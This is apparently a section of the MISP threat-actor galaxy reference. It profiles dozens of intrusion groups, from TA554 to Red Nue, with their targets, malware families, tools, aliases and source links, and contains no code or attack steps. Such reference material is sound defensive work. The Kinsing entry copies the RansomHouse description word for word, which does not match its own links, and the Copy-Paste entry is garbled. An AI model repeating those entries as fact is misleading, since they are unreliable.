Since May 2018, Proofpoint researchers have observed email campaigns using a new downloader called sLoad. sLoad is a PowerShell downloader that most frequently delivers Ramnit banker and includes noteworthy reconnaissance features. The malware gathers information about the infected system including a list of running processes, the presence of Outlook, and the presence of Citrix-related files. sLoad can also take screenshots and check the DNS cache for specific domains (e.g., targeted banks), as well as load external binaries. While initial versions of sLoad appeared in May 2018, we began tracking the campaigns from this actor (internally named TA554) since at least the beginning of 2017.

The tag is: misp-galaxy:threat-actor="TA554"

TA554 is also known as:

  • TH-163

Table 12099. Table References

Links

https://www.thaicert.or.th/downloads/files/Threat_Group_Cards_v2.0.pdf

TA555

Beginning in May 2018, Proofpoint researchers observed a previously undocumented downloader dubbed AdvisorsBot appearing in malicious email campaigns. The campaigns appear to primarily target hotels, restaurants, and telecommunications, and are distributed by an actor we track as TA555. To date, we have observed AdvisorsBot used as a first-stage payload, loading a fingerprinting module that, as with Marap, is presumably used to identify targets of interest to further infect with additional modules or payloads. AdvisorsBot is under active development and we have also observed another version of the malware completely rewritten in PowerShell and .NET.

The tag is: misp-galaxy:threat-actor="TA555"

Table 12100. Table References

Links

https://www.thaicert.or.th/downloads/files/Threat_Group_Cards_v2.0.pdf

TA800

This attacker is an affiliate distributor of the The Trick, also known as Trickbot, and BazaLoader. (For more on how affiliates work, see the description of TA573). TA800 has targeted a wide range of industries in North America, infecting victims with banking Trojans and malware loaders (malware designed to download other malware onto a compromised device). Malicious emails have often included recipients’ names, titles and employers along with phishing pages designed to look like the targeted company. Lures have included hard-to-resist subjects such as related to payment, meetings, termination, bonuses and complaints in the subject line or body of the email.

The tag is: misp-galaxy:threat-actor="TA800"

Table 12101. Table References

Links

https://www.proofpoint.com/us/blog/threat-insight/q4-2020-threat-report-quarterly-analysis-cybersecurity-trends-tactics-and-themes

MosesStaff

Cybereason Nocturnus describes Moses Staff as an Iranian hacker group, first spotted in October 2021. Their motivation appears to be to harm Israeli companies by leaking sensitive, stolen data.

The tag is: misp-galaxy:threat-actor="MosesStaff"

MosesStaff is also known as:

  • Moses Staff

  • Marigold Sandstorm

  • DEV-0500

MosesStaff has relationships with:

  • similar: misp-galaxy:microsoft-activity-group="Marigold Sandstorm" with estimative-language:likelihood-probability="likely"

Table 12102. Table References

Links

https://twitter.com/campuscodi/status/1450455259202166799

https://research.checkpoint.com/2021/mosesstaff-targeting-israeli-companies/

https://www.cybereason.com/blog/strifewater-rat-iranian-apt-moses-staff-adds-new-trojan-to-ransomware-operations

https://www.fortinet.com/blog/threat-research/guard-your-drive-from-driveguard

Avivore

The group’s existence came to light during Context’s investigation of a number of attacks against multinational enterprises that compromise smaller engineering services and consultancies working in their supply chains.

The tag is: misp-galaxy:threat-actor="Avivore"

Table 12103. Table References

Links

https://www.computerweekly.com/news/252471769/New-threat-group-behind-Airbus-cyber-attacks-claim-researchers

https://www.contextis.com/en/news/context-identifies-new-avivore-threat-group

https://web.archive.org/web/20191208223958/https://www.contextis.com/en/blog/avivore

HAZY TIGER

The Bitter threat group initially started using RAT tools in their campaigns, as the first Bitter versions, for Android released in 2014 were based on the AndroRAT framework. Over time, they switched to a custom version that has been known as BitterRAT ever since.

The tag is: misp-galaxy:threat-actor="HAZY TIGER"

HAZY TIGER is also known as:

  • Bitter

  • T-APT-17

  • APT-C-08

  • Orange Yali

Table 12104. Table References

Links

https://www.bitdefender.com/files/News/CaseStudies/study/352/Bitdefender-PR-Whitepaper-BitterAPT-creat4571-en-EN-GenericUse.pdf

https://mp.weixin.qq.com/s/8j_rHA7gdMxY1_X8alj8Zg

https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-report-download.pdf

LAPSUS

An actor group conducting large-scale social engineering and extortion campaign against multiple organizations with some seeing evidence of destructive elements.

The tag is: misp-galaxy:threat-actor="LAPSUS"

LAPSUS is also known as:

  • LAPSUS$

  • DEV-0537

  • SLIPPY SPIDER

  • Strawberry Tempest

LAPSUS has relationships with:

  • similar: misp-galaxy:microsoft-activity-group="Strawberry Tempest" with estimative-language:likelihood-probability="likely"

Table 12105. Table References

Links

https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/

https://blog.checkpoint.com/2022/03/07/lapsus-ransomware-gang-uses-stolen-source-code-to-disguise-malware-files-as-trustworthy-check-point-customers-remain-protected/

https://www.crowdstrike.com/adversaries/slippy-spider/

Scarab

Scarab APT was first spotted in 2015, but is believed to have been active since at least 2012, conducting surgical attacks against a small number of individuals across the world, including Russia and the United States. The backdoor deployed by Scarab in their campaigns is most commonly known as Scieron.

The tag is: misp-galaxy:threat-actor="Scarab"

Table 12106. Table References

Links

https://web.archive.org/web/20150124025612/http://www.symantec.com:80/connect/blogs/scarab-attackers-took-aim-select-russian-targets-2012

https://www.sentinelone.com/labs/chinese-threat-actor-scarab-targeting-ukraine

Copy-Paste

The title ‘Copy-paste compromises’ is derived from the actor’s heavy use of tools copied almost identically from open source given by The Australian Government.

The tag is: misp-galaxy:threat-actor="Copy-Paste"

Copy-Paste is also known as:

Table 12108. Table References

Links

https://www.cyber.gov.au/acsc/view-all-content/alerts/copy-paste-compromises

https://www.cyber.gov.au/acsc/view-all-content/advisories/advisory-2020-008-copy-paste-compromises-tactics-techniques-and-procedures-used-target-multiple-australian-networks

Killnet

A group targeting various countries using Denial of Services attacked.

The tag is: misp-galaxy:threat-actor="Killnet"

Killnet is also known as:

Table 12109. Table References

Links

https://www.cisa.gov/uscert/ncas/alerts/aa22-110a

https://therecord.media/russia-or-ukraine-hacking-groups-take-sides/?msclkid=235244a7ba6611ec92f21c9bd3b8ee49

https://www.expats.cz/czech-news/article/pro-russian-hackers-target-czech-websites-in-a-series-of-attacks

UNC3524

Mandiant observed this group operating since December 2019. Its techniques partially overlap with multiple Russian-based espionage actors (APT28 and APT29). They are described as having a high level of operational security, low malware footprint, adept evasive skills, and a large Internet of Things (IoT) device botnet at their disposal.

The tag is: misp-galaxy:threat-actor="UNC3524"

Table 12111. Table References

Links

https://www.mandiant.com/resources/unc3524-eye-spy-email

Curious Gorge

Curious Gorge, a group TAG attributes to China’s PLA SSF, has conducted campaigns against government and military organizations in Ukraine, Russia, Kazakhstan, and Mongolia. The actor has remained active against government, military, logistics and manufacturing organizations in Ukraine, Russia and Central Asia. In Russia, long running campaigns against multiple government organizations have continued, including the Ministry of Foreign Affairs. Over the past week, TAG identified additional compromises impacting multiple Russian defense contractors and manufacturers and a Russian logistics company.

The tag is: misp-galaxy:threat-actor="Curious Gorge"

Curious Gorge is also known as:

  • UNC3742

Table 12112. Table References

Links

https://blog.google/threat-analysis-group/tracking-cyber-activity-eastern-europe

https://blog.google/threat-analysis-group/update-on-cyber-activity-in-eastern-europe/

https://services.google.com/fh/files/blogs/google_fog_of_war_research_report.pdf

Red Menshen

Since 2021, Red Menshen, a China based threat actor, which has been observed targeting telecommunications providers across the Middle East and Asia, as well as entities in the government, education, and logistics sectors using a custom backdoor referred as BPFDoor. This threat actor uses a variety of tools in its post-exploitation phase. This includes custom variants of the shared tool Mangzamel (including Golang variants), custom variants of Gh0st, and open source tools like Mimikatz and Metasploit to aid in its lateral movement across Windows systems. Also, They have been seen sending commands to BPFDoor victims via Virtual Privat Servers (VPSs) hosted at a well-known provider, and that these VPSs, in turn, are administered via compromised routers based in Taiwan, which the threat actor uses as VPN tunnels. Most Red Menshen activity that has been observed took place between Monday to Friday (with none observed on the weekends), with most communication taking place between 01:00 and 10:00 UTC.131 This pattern suggests a consistent 8 to 9-hour activity window for the threat actor, with realistic probability of it aligning to local working hours.

The tag is: misp-galaxy:threat-actor="Red Menshen"

Red Menshen is also known as:

  • Red Dev 18

Table 12113. Table References

Links

https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-report-download.pdf

https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-annex-download.pdf

https://troopers.de/troopers22/talks/7cv8pz

Cosmic Lynx

Cosmic Lynx is a Russia-based BEC cybercriminal organization that has significantly impacted the email threat landscape with sophisticated, high-dollar phishing attacks.

The tag is: misp-galaxy:threat-actor="Cosmic Lynx"

Table 12114. Table References

Links

https://www.agari.com/cyber-intelligence-research/whitepapers/acid-agari-cosmic-lynx.pdf

ModifiedElephant

Our research into these intrusions revealed a decade of persistent malicious activity targeting specific groups and individuals that we now attribute to a previously unknown threat actor named ModifiedElephant. This actor has operated for years, evading research attention and detection due to their limited scope of operations, the mundane nature of their tools, and their regionally-specific targeting. ModifiedElephant is still active at the time of writing.

The tag is: misp-galaxy:threat-actor="ModifiedElephant"

Table 12115. Table References

Links

https://www.sentinelone.com/labs/modifiedelephant-apt-and-a-decade-of-fabricating-evidence/

EXOTIC LILY

EXOTIC LILY is a resourceful, financially motivated group whose activities appear to be closely linked with data exfiltration and deployment of human-operated ransomware such as Conti and Diavol. In early September 2021, the group has been obeserved exploiting a 0day in Microsoft MSHTML (CVE-2021-40444). Investigation lead researchers to believe that they are an Initial Access Broker (IAB) who appear to be working with the Russian cyber crime gang known as FIN12 (Mandiant, FireEye) / WIZARD SPIDER (CrowdStrike). This threat actor deploys tactics, techniques and procedures (TTPs) that are traditionally associated with more targeted attacks, like spoofing companies and employees as a means of gaining trust of a targeted organization through email campaigns that are believed to be sent by real human operators using little-to-no automation. Additionally and rather uniquely, they leverage legitimate file-sharing services like WeTransfer, TransferNow and OneDrive to deliver the payload, namely BUMBLEEBEE and BAZARLOADER, further evading detection mechanisms. This level of human-interaction is rather unusual for cyber crime groups focused on mass scale operations.

The tag is: misp-galaxy:threat-actor="EXOTIC LILY"

EXOTIC LILY is also known as:

  • DEV-0413

Table 12116. Table References

Links

https://www.microsoft.com/security/blog/2021/09/15/analyzing-attacks-that-exploit-the-mshtml-cve-2021-40444-vulnerability

https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti

TA578

TA578, a threat actor that Proofpoint researchers have been tracking since May of 2020. TA578 has previously been observed in email-based campaigns delivering Ursnif, IcedID, KPOT Stealer, Buer Loader, BazaLoader, and Cobalt Strike.

The tag is: misp-galaxy:threat-actor="TA578"

Table 12117. Table References

Links

https://www.proofpoint.com/us/blog/threat-insight/bumblebee-is-still-transforming

TA579

TA579, a threat actor that Proofpoint researchers have been tracking since August 2021. This actor frequently delivered BazaLoader and IcedID in past campaigns.

The tag is: misp-galaxy:threat-actor="TA579"

Table 12118. Table References

Links

https://www.proofpoint.com/us/blog/threat-insight/bumblebee-is-still-transforming

RansomHouse

This group started operating during the first quarter of 2022. They published samples of alleged stolen data from companies on their site on Tor. It is unclear if they conducted the attacks themselves, or if they bought leaked databases from third parties.

The tag is: misp-galaxy:threat-actor="RansomHouse"

Table 12119. Table References

Links

https://webz.io/dwp/new-ransomware-group-ransomhouse-is-it-real-or-fake/

ToddyCat

ToddyCat is responsible for multiple sets of attacks detected since December 2020 against high-profile entities in Europe and Asia. There is still little information about this actor, but its main distinctive signs are two formerly unknown tools that Kaspersky call ‘Samurai backdoor’ and ‘Ninja Trojan’.

The tag is: misp-galaxy:threat-actor="ToddyCat"

ToddyCat is also known as:

  • Websiic

Table 12120. Table References

Links

https://www.bleepingcomputer.com/news/security/new-toddycat-apt-group-targets-exchange-servers-in-asia-europe/

https://securelist.com/toddycat/106799/

https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/

https://gteltsc.vn/blog/cap-nhat-nhe-ve-lo-hong-bao-mat-0day-microsoft-exchange-dang-duoc-su-dung-de-tan-cong-cac-to-chuc-tai-viet-nam-9685.html

https://community.riskiq.com/article/d8b749f2

https://teamt5.org/en/posts/assassinations-of-minininja-in-various-apac-countries/

POLONIUM

Microsoft successfully detected and disabled attack activity abusing OneDrive by a previously undocumented Lebanon-based activity group Microsoft Threat Intelligence Center (MSTIC) tracks as POLONIUM.

The tag is: misp-galaxy:threat-actor="POLONIUM"

POLONIUM is also known as:

  • Plaid Rain

  • UNC4453

  • GREATRIFT

POLONIUM has relationships with:

  • similar: misp-galaxy:microsoft-activity-group="Plaid Rain" with estimative-language:likelihood-probability="likely"

Table 12121. Table References

Links

https://www.microsoft.com/security/blog/2022/06/02/exposing-polonium-activity-and-infrastructure-targeting-israeli-organizations/

https://www.deepinstinct.com/blog/polonium-apt-group-uncovering-new-elements

https://services.google.com/fh/files/misc/tool-of-first-resort-israel-hamas-war-cyber.pdf

Predatory Sparrow

A self-proclaimed hacktivist group that carried out attacks against Iranian railway systems and against Iranian steel plants.

The tag is: misp-galaxy:threat-actor="Predatory Sparrow"

Predatory Sparrow is also known as:

  • Indra

  • Gonjeshke Darande

Table 12122. Table References

Links

https://www.bbc.com/news/technology-62072480

https://twitter.com/cpresearch/status/1541753913732366338

https://research.checkpoint.com/2021/indra-hackers-behind-recent-attacks-on-iran/

DEV-0586

MSTIC has not found any notable associations between this observed activity, tracked as DEV-0586, and other known activity groups. MSTIC assesses that the malware (WhisperGate), which is designed to look like ransomware but lacking a ransom recovery mechanism, is intended to be destructive and designed to render targeted devices inoperable rather than to obtain a ransom.

The tag is: misp-galaxy:threat-actor="DEV-0586"

DEV-0586 is also known as:

  • Ruinous Ursa

  • Cadet Blizzard

DEV-0586 has relationships with:

  • similar: misp-galaxy:microsoft-activity-group="Cadet Blizzard" with estimative-language:likelihood-probability="likely"

Table 12123. Table References

Links

https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/

https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine/

https://unit42.paloaltonetworks.com/atoms/ruinousursa/

https://www.microsoft.com/en-us/security/blog/2023/06/14/cadet-blizzard-emerges-as-a-novel-and-distinct-russian-threat-actor/

Kinsing

This group started operating during the first quarter of 2022. They published samples of alleged stolen data from companies on their site on Tor. It is unclear if they conducted the attacks themselves, or if they bought leaked databases from third parties.

The tag is: misp-galaxy:threat-actor="Kinsing"

Kinsing is also known as:

  • Money Libra

Table 12124. Table References

Links

https://www.trendmicro.com/en_us/research/20/k/analysis-of-kinsing-malwares-use-of-rootkit.html

https://blog.aquasec.com/threat-alert-kinsing-malware-container-vulnerability

https://sysdig.com/blog/zoom-into-kinsing-kdevtmpfsi/

https://unit42.paloaltonetworks.com/atoms/moneylibra/

Earth Berberoka

According to TrendMicro, Earth Berberoka is a threat group originating from China that mainly focuses on targeting gambling websites. This group’s campaign uses multiple malware families that target the Windows, Linux, and macOS platforms that have been attributed to Chinese-speaking actors. Aside from using tried-and-tested malware families that have been upgraded, such as PlugX and Gh0st RAT, Earth Berberoka has also developed a brand-new complex, multistage malware family, which has been dubbed PuppetLoader.

The tag is: misp-galaxy:threat-actor="Earth Berberoka"

Earth Berberoka is also known as:

  • GamblingPuppet

Table 12125. Table References

Links

https://documents.trendmicro.com/assets/white_papers/wp-operation-earth-berberoka.pdf

https://www.trendmicro.com/en_us/research/22/d/new-apt-group-earth-berberoka-targets-gambling-websites-with-old.html

https://documents.trendmicro.com/assets/txt/earth-berberoka-windows-iocs-2.txt

https://documents.trendmicro.com/assets/txt/earth-berberoka-linux-iocs-2.txt

https://documents.trendmicro.com/assets/txt/earth-berberoka-macos-iocs-2.txt

https://documents.trendmicro.com/assets/txt/earth-berberoka-domains-2.txt

https://www.youtube.com/watch?v=QXGO4RJaUPQ

https://www.botconf.eu/wp-content/uploads/2022/05/Botconf2022-40-LunghiHorejsi.pdf

https://securelist.com/diceyf-deploys-gameplayerframework-in-online-casino-development-studio/107723/

https://www.trendmicro.com/en_us/research/22/h/irontiger-compromises-chat-app-Mimi-targets-windows-mac-linux-users.html

Earth Lusca

Earth Lusca is a threat actor from China that targets organizations of interest to the Chinese government, including academic institutions, telecommunication companies, religious organizations, and other civil society groups. Earth Lusca’s tools closely resemble those used by Winnti Umbrella, but the group appears to operate separately from Winnti. Earth Lusca has also been observed targeting cryptocurrency payment platforms and cryptocurrency exchanges in what are likely financially motivated attacks.

The tag is: misp-galaxy:threat-actor="Earth Lusca"

Earth Lusca is also known as:

  • CHROMIUM

  • ControlX

  • TAG-22

  • FISHMONGER

  • BRONZE UNIVERSITY

  • AQUATIC PANDA

  • Red Dev 10

  • RedHotel

  • Charcoal Typhoon

Earth Lusca has relationships with:

  • similar: misp-galaxy:microsoft-activity-group="Charcoal Typhoon" with estimative-language:likelihood-probability="likely"

Table 12126. Table References

Links

https://hello.global.ntt/-/media/ntt/global/insights/white-papers/the-operations-of-winnti-group.pdf

https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf

https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan

https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RWMFIi

https://media-exp1.licdn.com/dms/document/C561FAQHhWFRcWmdCPw/feedshare-document-pdf-analyzed/0/1639591145314?e=1658966400&v=beta&t=_uCcyEVg6b_VDiBTvWQIXtBOdQ1GQAAydqGyq62KA3E

https://www.sentinelone.com/wp-content/uploads/2021/08/SentinelOne_-SentinelLabs_ShadowPad_WP_V2.pdf

https://www.pwc.co.uk/issues/cyber-security-services/research/chasing-shadows.html

https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools

https://decoded.avast.io/luigicamastra/backdoored-client-from-mongolian-ca-monpass

https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-report-download.pdf

https://go.recordedfuture.com/hubfs/reports/cta-2023-0808.pdf

Earth Wendigo

Earth Wendigo is a threat actor from China that has been targeting several organizations — including government organizations, research institutions, and universities in Taiwan — since May 2019, aiming to exfiltrate emails from targeted organizations via the injection of JavaScript backdoors to a webmail system that is widely used in Taiwan. The threat actor also sent spear-phishing emails embedded with malicious links to multiple individuals, including politicians and activists, who support movements in Tibet, the Uyghur region, or Hong Kong.

The tag is: misp-galaxy:threat-actor="Earth Wendigo"

Table 12127. Table References

Links

https://www.trendmicro.com/en_us/research/21/a/earth-wendigo-injects-javascript-backdoor-to-service-worker-for-.html

BRONZE EDGEWOOD

In early 2021 CTU researchers observed BRONZE EDGEWOOD exploiting the Microsoft Exchange Server of an organization in Southeast Asia. The threat group deployed a China Chopper webshell and ran the Nishang Invoke-PowerShellTcp.ps1 script to connect back to C2 infrastructure. The threat group is publicly linked to malware families Chinoxy, PCShare and FunnyDream. CTU researchers have discovered that BRONZE EDGEWOOD also leverages Cobalt Strike in its intrusion activity. BRONZE EDGEWOOD has been active since at least 2018 and targets government and private enterprises across Southeast Asia. CTU researchers assess with moderate confidence that BRONZE EDGEWOOD operates on behalf the Chinese government and has a remit that covers political espionage.

The tag is: misp-galaxy:threat-actor="BRONZE EDGEWOOD"

BRONZE EDGEWOOD is also known as:

  • Red Hariasa

Table 12128. Table References

Links

https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf

https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-report-download.pdf

APT9

APT9 engages in cyber operations where the goal is data theft, usually focusing on the data and projects that make a particular organization competitive within its field. APT9 was historically very active in the pharmaceuticals and biotechnology industry. We have observed this actor use spearphishing, valid accounts, as well as remote services for Initial Access. On at least one occasion, Mandiant observed APT9 at two companies in the biotechnology industry and suspect that APT9 actors may have gained initial access to one of the companies by using a trusted relationship between the two companies. APT9 use a wide range of backdoors, including publicly available backdoors, as well as backdoors that are believed to be custom, but are used by multiple APT groups.

The tag is: misp-galaxy:threat-actor="APT9"

APT9 is also known as:

  • NIGHTSHADE PANDA

  • Red Pegasus

  • Group 27

Table 12129. Table References

Links

https://otx.alienvault.com/pulse/55bbc68e67db8c2d547ae393

https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-report-download.pdf

https://www.mandiant.com/resources/insights/apt-groups

https://app.box.com/s/z1uanuv1vn3vw5iket1r6bqrmlra0gpn

https://news.softpedia.com/news/trochilus-rat-evades-antivirus-detection-used-for-cyber-espionage-in-south-east-asia-498776.shtml

https://unit42.paloaltonetworks.com/unit42-trochilus-rat-new-moonwind-rat-used-attack-thai-utility-organizations/

BRONZE SPRING

BRONZE SPRING is a threat group that CTU researchers assess with high confidence operates on behalf of China in the theft of intellectual property from defense, engineering, pharmaceutical and technology companies. The threat group typically uses scan-and-exploit for initial access, deploys the China Chopper webshell for remote execution and persistence, and creates RAR archives with a '.jpg' file extension for data exfiltration. In July 2020 the U.S. Department of Justice indicted two Chinese hackers CTU researchers assess are members of the BRONZE SPRING threat group. The Department of Justice allege these hackers were responsible for compromising networks of hundreds of organisations and individuals in the U.S. and abroad since 2009, and that exfiltrated data would be passed to the Chinese Ministry of State Security or sold for financial gain.

The tag is: misp-galaxy:threat-actor="BRONZE SPRING"

BRONZE SPRING is also known as:

  • UNC302

Table 12130. Table References

Links

https://www.justice.gov/opa/pr/two-chinese-hackers-working-ministry-state-security-charged-global-computer-intrusion

https://www.justice.gov/opa/press-release/file/1295981/download

https://www.justice.gov/opa/press-release/file/1295986/download

https://intrusiontruth.wordpress.com/2021/05/06/an-apt-with-no-name

https://twitter.com/MrDanPerez/status/1390285821786394624

BRONZE STARLIGHT

BRONZE STARLIGHT has been active since mid 2021 and targets organizations globally across a range of industry verticals. The group leverages HUI Loader to load Cobalt Strike and PlugX payloads for command and control. CTU researchers have observed BRONZE STARLIGHT deploying ransomware to compromised networks as part of name-and-shame ransomware schemes, and posted victim names to leak sites. CTU researchers assess with moderate confidence that BRONZE STARLIGHT is located in China based on observed tradecraft, including the use of HUI Loader and PlugX which are associated with China-based threat group activity. It is plausible that BRONZE STARLIGHT deploys ransomware as a smokescreen rather than for financial gain, with the underlying motivation of stealing intellectual property theft or conducting espionage.

The tag is: misp-galaxy:threat-actor="BRONZE STARLIGHT"

BRONZE STARLIGHT is also known as:

  • SLIME34

  • DEV-0401

  • Cinnamon Tempest

  • Emperor Dragonfly

BRONZE STARLIGHT has relationships with:

  • similar: misp-galaxy:microsoft-activity-group="Cinnamon Tempest" with estimative-language:likelihood-probability="likely"

Table 12131. Table References

Links

https://i.blackhat.com/Asia-22/Friday-Materials/AS-22-Li-To-Loot-Or-Not-To-Loot-That-Is-Not-a-Question.pdf

https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself

https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation

https://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility

https://twitter.com/cglyer/status/1480734487000453121

https://blog.sygnia.co/revealing-emperor-dragonfly-a-chinese-ransomware-group

https://www.sentinelone.com/labs/chinese-entanglement-dll-hijacking-in-the-asian-gambling-sector/

https://www.microsoft.com/en-us/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/

https://www.secureworks.com/research/bronze-starlight-ransomware-operations-use-hui-loader

BRONZE HIGHLAND

BRONZE HIGHLAND has been observed using spearphishing as an initial infection vector to deploy the MgBot remote access trojan against targets in Hong Kong. Third party reporting suggests the threat group also targets India, Malaysia and Taiwan and leverages Cobalt Strike and KsRemote Android Rat. CTU researchers assess with moderate confidence that BRONZE HIGHLAND operates on behalf of China and has a remit covering espionage against domestic human rights and pro-democracy advocates and nations neighbouring China

The tag is: misp-galaxy:threat-actor="BRONZE HIGHLAND"

BRONZE HIGHLAND is also known as:

  • Evasive Panda

  • Daggerfly

Table 12132. Table References

Links

https://blog.malwarebytes.com/threat-analysis/2020/07/chinese-apt-group-targets-india-and-hong-kong-using-new-variant-of-mgbot-malware

https://vb2020.vblocalhost.com/uploads/VB2020-43.pdf

https://www.youtube.com/watch?v=LeKi0KfzOow&list=PLffioUnqXWkdzWcZXH-bzPVgcs2R4r7iS&index=1&t=2154s

https://www.welivesecurity.com/2023/04/26/evasive-panda-apt-group-malware-updates-popular-chinese-software/

BRONZE SPIRAL

In December 2020, the IT management software provider SolarWinds announced that an unidentified threat actor had exploited a vulnerability in their Orion Platform software to deploy a web shell dubbed SUPERNOVA. CTU researchers track the operators of the SUPERNOVA web shell as BRONZE SPIRAL and assess with low confidence that the group is of Chinese origin. SUPERNOVA was likely deployed through exploitation of CVE-2020-10148, and CTU researchers observed post-exploitation reconnaissance commands roughly 30 minutes before the web shell was deployed. This may have been indicative of the threat actor conducting scan-and-exploit activity and then triaging for victims of particular interest, before deploying SUPERNOVA and attempting to dump credentials and move laterally.

BRONZE SPIRAL has been associated with previous intrusions involving the targeting of ManageEngine servers, maintenance of long-term access to periodically harvest credentials and exfiltrate data, and espionage or theft of intellectual property. The threat group makes extensive use of native system tools and 'living off the land' techniques.

The tag is: misp-galaxy:threat-actor="BRONZE SPIRAL"

Table 12133. Table References

Links

https://unit42.paloaltonetworks.com/solarstorm-supernova

https://www.guidepointsecurity.com/blog/supernova-solarwinds-net-webshell-analysis

https://www.secureworks.com/blog/supernova-web-shell-deployment-linked-to-spiral-threat-group

https://www.sentinelone.com/labs/solarwinds-understanding-detecting-the-supernova-webshell-trojan

https://us-cert.cisa.gov/ncas/analysis-reports/ar21-027a

https://www.cisa.gov/news-events/analysis-reports/ar21-112a

BRONZE VAPOR

BRONZE VAPOR is a targeted threat group assessed with moderate confidence to be of Chinese origin. Artefacts from tools associated with this group and open source reporting on related incidents indicate that BRONZE VAPOR have operated since at least 2017. The group conducts espionage against multiple industries including semiconductors, aviation and telecommunications. CTU researchers assess BRONZE VAPOR’s intent to be information theft, with operations focused on intellectual property (semiconductors) and personally identifiable information such as traveller records (aviation). Compromise of telecommunications companies can yield personally identifiable information and meta data on client communications such as Call Data Records (CDR).

Prior to 2019 their operational focus, with some exceptions, revolved around targets in East Asia particularity Taiwan with it’s thriving semiconductor industry. In 2021 details emerged in open source of attacks on at least one European semiconductor company believed to date back to 2017. In 2019 BRONZE VAPOR attacked one of more entities in the European airlines sector. The group gains initial access via VPN services, may use spearphishing with 'Letter of Appointment' themed lures, and deploys Cobalt Strike along with custom data exfiltration tools to target organizations. Post-intrusion activity involves living-of-the-land using legitimate tools and commands available within victim environment as well as using AceHash for credential harvesting, WATERCYCLE for data exfiltration and STOCKPIPE for proxying information through Microsoft Exchange servers over email.

BRONZE VAPOR uses a set of tactics that, although not individually unique, when viewed in aggregate create a relatively distinct playbook. Intrusions begin with credential based attacks against an existing remote access solution (Citrix, VPN etc.) or B2B network access. Cobalt Strike is deployed into the environment and further access is then conducted via Cobalt Strike Beacon and other features of the platform. Sharphound is deployed to map out the victim’s Active Directory infrastructure and and collect critical information about the domain including important account names. Command and control infrastructure is hosted on subdomains of Azure and Appspot services to blend in with legitimate traffic. The threat actor also registers their own domains for command and control, often with a "sync" or "update" related theme. WinRAR is commonly used for compressing data prior to exfiltration. Filenames for these archives often involve a string of numbers and variations of the word "update". Data is exfiltrated using WATERCYCLE to cloud based platforms such as OneDrive and GoogleDrive.

The tag is: misp-galaxy:threat-actor="BRONZE VAPOR"

Table 12134. Table References

Links

https://www.secureworks.com/research/threat-profiles/bronze-vapor

Vicious Panda

Check Point Research discovered a new campaign against the Mongolian public sector, which takes advantage of the current Coronavirus scare, in order to deliver a previously unknown malware implant to the target. A closer look at this campaign allowed us to tie it to other operations which were carried out by the same anonymous group, dating back to at least 2016. Over the years, these operations targeted different sectors in multiple countries, such as Ukraine, Russia, and Belarus.

The tag is: misp-galaxy:threat-actor="Vicious Panda"

Vicious Panda is also known as:

  • SixLittleMonkeys

Table 12135. Table References

Links

https://securelist.com/microcin-is-here/97353

https://securelist.com/a-simple-example-of-a-complex-cyberattack/82636

https://decoded.avast.io/luigicamastra/apt-group-planted-backdoors-targeting-high-profile-networks-in-central-asia

https://www.welivesecurity.com/2020/05/14/mikroceen-spying-backdoor-high-profile-networks-central-asia

https://research.checkpoint.com/2020/vicious-panda-the-covid-campaign

https://unit42.paloaltonetworks.com/unit42-threat-actors-target-government-belarus-using-cmstar-trojan

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07170759/Microcin_Technical_4PDF_eng_final_s.pdf

https://securelist.com/apt-trends-report-q2-2019/91897

https://securelist.com/apt-trends-report-q2-2020/97937

https://securelist.com/it-threat-evolution-q2-2020/98230

https://securelist.com/apt-trends-report-q3-2021/104708

https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/

Red Nue

Red Nue, active since at least 2017, is known for its use of the multi-platform LootRAt backdoor, also known as ReverseWindow. LootRAT has variants for Windows and Macintosh (reported in open source as Demsty), as well as an Android variant known as SpyDealer. Red Nue has also used another Windows backdoor known as WinDealer since at least 2019, when it deployed it to targets as part of a watering hole campaign on a Chinese news website for the Chinese diaspora community. Parts of Asia feature heavily in Red Nue’s victimology.

The tag is: misp-galaxy:threat-actor="Red Nue"

Red Nue is also known as:

  • LuoYu

Table 12136. Table References

Links

https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-report-download.pdf

https://jsac.jpcert.or.jp/archive/2021/pdf/JSAC2021_301_shui-leon_en.pdf

https://blogs.jpcert.or.jp/en/2021/10/windealer.html

https://securelist.com/windealer-dealing-on-the-side/105946

https://blogs.blackberry.com/en/2022/06/threat-thursday-china-based-apt-plays-auto-updater-card-to-deliver-windealer-malware

